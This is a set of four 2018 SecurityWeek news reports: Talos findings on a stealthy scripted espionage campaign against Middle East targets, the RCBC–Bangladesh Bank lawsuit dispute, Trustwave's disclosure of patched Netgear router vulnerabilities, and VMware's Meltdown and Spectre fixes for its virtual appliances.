9.2.2018 securityweek  Krypto
An actor making extensive use of scripting languages in attacks on targets in the Middle East demonstrates excellent operational security (OPSEC), researchers from Talos say.

As part of these targeted attacks allegedly confidential decoy documents supposedly written by the Jordanian publishing and research house Dar El-Jaleel were used, as well as VBScript, PowerShell, and VBA scripts that would dynamically load and execute functions retrieved from a command and control (C&C) server.

The threat actor(s) was particularly careful to camouflage the infrastructure and used several reconnaissance scripts to check the validity of victim machines. The actor was observed blocking systems that didn't meet their criteria, filtering connections based on their User-Agent strings, and hosting the infrastructure on CloudFlare.

Attacks start with a VBScript designed to create a second stage PowerShell script that would create a Microsoft Office document and to open it. The document was purportedly written by Dar El-Jaleel, an institute well-known for their research of the Palestinian-Israeli conflict and the Sunni-Shia conflict in Iran.

Supposedly a confidential analysis report on Iranian activities within the Syrian civil war, the document contains a macro designed to create a WSF (Windows Script File) file and to execute it. The WSF script, Talos discovered, is the main part of the infection and contains a User-Agent used to identify the targets.

The script first registers the infected system with a command and control server and executes an infinite loop, trying to contact the /search URI every 5 seconds to download and execute payloads.

These payloads are of three types, but all are VBScript functions loaded and executed on the fly using the ExecuteGlobal() and GetRef() APIs, differentiated by the number of arguments supplied: none, one, or two. The security researchers received five different functions, all obfuscated.

A reconnaissance function was received a few minutes after the initial compromise, meant to retrieve information from the infected system: disk volume serial number, installed anti-virus software, Internet IP address, computer name, username, Operating System, and architecture. All data is sent to the C&C. A second reconnaissance function was used to list the drives of the system and their type.

Two functions meant to achieve persistence for the WSF script were received as well: one script was used to persist, while the second was meant to clean the infected system.

The system also received a pivot function, which was meant to execute a PowerShell script. In turn, the script would execute a second base64 encoded script.

One last PowerShell script served to the system was meant to download shellcode from 176[.]107[.]185[.]246 IP, map it in memory, and execute it. While the shellcode wasn’t retrieved during investigation, the process revealed the many precautions the attacker takes before delivering the payload.

The attacker’s C&C is protected by CloudFlare, which makes it difficult to track and analyze the campaign. The researchers noticed that the actor was active during the morning (Central European Time zone), and that payloads were only sent during that time.

Furthermore, the attacker’s server becomes unreachable after serving the shellcode (the firewall is disabled for a few minutes to allow the download to go through). The actor was also observed blacklisting some of the researchers’ specific User-Agent strings and IP addresses.

“This high level of OPSEC is exceptional even among presumed state sponsored threat actors,” Talos notes.

The VBScript used during this campaign shows similarities to Jenxcus (also known as Houdini/H-Worm), but the researchers are not sure whether the actor used “new version of Jenxcus or if this malware served as the inspiration for their own malicious code.”

While Jenxcus’ source code is available on the Internet, the adaptation observed in these attacks is more advanced, with the functions loaded on demand and the initial script including only parts of the code, not all of it.

The security researchers were also able to identify different targets based on the User-Agent and say that targeted campaigns using Dar El-Jaleel decoy documents were observed before. In fact, the same decoy documents were observed in several attacks in 2017, but it is not clear if the same actor is behind all of them.

“These campaigns show us that at least one threat actor is interested in and targeting the Middle East. Due to the nature of the decoy documents, we can conclude that the intended targets have an interest in the geopolitical context of the region,” Talos notes.


Philippine Bank Threatens Counter-Suit Over World's Biggest Cyber-Heist
9.2.2018 securityweek  Cyber
The Philippine bank used by hackers to transfer money in the world's biggest cyber heist warned of tit-for-tat legal action Thursday, after Bangladeshi officials said they would sue the lender.

Unidentified hackers stole $81 million from the Bangladesh central bank's account with the US Federal Reserve in New York two years ago, then transferred it to a Manila branch of the Rizal Commercial Banking Corp (RCBC).

The funds were then swiftly withdrawn and laundered through local casinos.

Bangladeshi officials said Wednesday they are readying a case against RCBC for its alleged role in the heist.

One of the officials, Bangladesh's Finance Minister A.M.A Muhith, said last year he wanted to "wipe out" RCBC.

But RCBC maintained the February 2016 cyber-heist was an "inside job" and that the Philippine bank was being used as a scapegoat to hide the real culprits.

RCBC, one of the Philippines' largest banks, charged that Bangladeshi officials were hiding their own findings into the crime, possibly to conceal the involvement of their own officials in the heist.

"RCBC has had it and will consider a lawsuit against Bangladesh Central Bank officials for claiming the bank had a hand in the $81M cyber-heist," the Philippine lender said in a statement.

"They are perpetuating the cover-up and using RCBC as a scapegoat to keep their people in the dark," the RCBC statement said.

The Philippine central bank imposed a record $21 million fine on RCBC after the discovery of the heist as it investigated the lender's alleged role in the theft.

Only a small amount of the stolen money has been recovered.

Money-laundering charges were also filed against the RCBC branch manager.

The US reserve bank, which manages the Bangladesh Bank reserve account, has denied its own systems were breached.


Flaws Affecting Top-Selling Netgear Routers Disclosed
9.2.2018 securityweek 
Vulnerebility
Security firm Trustwave has disclosed the details of several vulnerabilities affecting Netgear routers, including devices that are top-selling products on Amazon and Best Buy.

The flaws were discovered by researchers in March 2017 and they were patched by Netgear in August, September and October.

One of the high severity vulnerabilities has been described as a password recovery and file access issue affecting 17 Netgear routers and modem routers, including best-sellers such as R6400, R7000 (Nighthawk), R8000 (Nighthawk X6), and R7300DST (Nighthawk DST).Vulnerabilities in Netgear Nighthawk routers

According to Trustwave, the web server shipped with these and other Netgear routers has a resource that can be abused to access files in the device’s root directory and other locations if the path is known. The exposed files can store administrator usernames and passwords, which can be leveraged to gain complete control of the device.

An unauthenticated attacker can exploit the flaw remotely if the remote management feature is enabled on the targeted device. Improperly implemented cross-site request forgery (CSRF) protections may also allow remote attacks.

Another high severity flaw affecting 17 Netgear routers, including the aforementioned best-sellers, can be exploited by an attacker to bypass authentication using a specially crafted request. Trustwave said the vulnerability can be easily exploited.

Vulnerabilities in Netgear Nighthawk routers

A flaw that can be exploited to execute arbitrary OS commands with root privileges without authentication has also been classified as high severity. Trustwave said command injection is possible through a chained attack that involves a CSRF token recovery vulnerability and other weaknesses.

Two other command injection vulnerabilities have been found by Trustwave researchers, but they have been rated medium severity and they only affect six Netgear router models.

One of the flaws requires authentication, but experts pointed out that an attacker can execute arbitrary commands after bypassing authentication using the aforementioned authentication bypass vulnerability.

The other medium severity command injection is related to the Wi-Fi Protected Setup (WPS). When a user presses the WPS button on a Netgear router, a bug causes WPS clients to be allowed to execute arbitrary code on the device with root privileges during the setup process.

“In other words, if an attacker can press the WPS button on the router, the router is completely compromised,” Trustwave said in an advisory.

Netgear has put a lot of effort into securing its products, especially since the launch of its bug bounty program one year ago. In 2017, the company published more than 180 security advisories describing vulnerabilities in its routers, gateways, extenders, access points, managed switches, and network-attached storage (NAS) products.


VMware Addresses Meltdown, Spectre Flaws in Virtual Appliances
9.2.2018 securityweek 
Vulnerebility
VMware has started releasing patches and workarounds for the Virtual Appliance products affected by the recently disclosed CPU vulnerabilities known as Meltdown and Spectre.

According to an advisory published on Thursday, Meltdown and Spectre impact several VMware Virtual Appliances, including vCloud Usage Meter (UM), Identity Manager (vIDM), vCenter Server (vCSA), vSphere Data Protection (VDP), vSphere Integrated Containers (VIC) and vRealize Automation (vRA).

VMware has so far released a patch only for its VIC product, and workarounds have been made available for UM, vIDM, vCSA, and vRA. vCSA 5.5 is not affected, and neither patches nor workarounds have been released for VDP.

VMware has released separate advisories describing the specific workarounds for each product. The company advised users not to apply workarounds to other products than the one they are intended for, and pointed out that the workarounds are only meant to be a temporary solution until permanent fixes become available.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data. Billions of devices using Intel, AMD, ARM, Qualcomm and IBM processors are affected.

Intel started releasing microcode updates for its processors shortly after the flaws were disclosed, but the company decided to halt updates due to frequent reboots and unpredictable system behavior.

Following Intel’s announcement, VMware informed customers that it had decided to delay new releases of microcode updates for its ESXi hypervisor until the chipmaker addresses problems.

Intel announced this week that it has identified the root of an issue that caused systems to reboot more frequently and started releasing a new round of patches.

Intel and AMD told customers that their future products will include built-in protections for exploits such as Specter and Meltdown.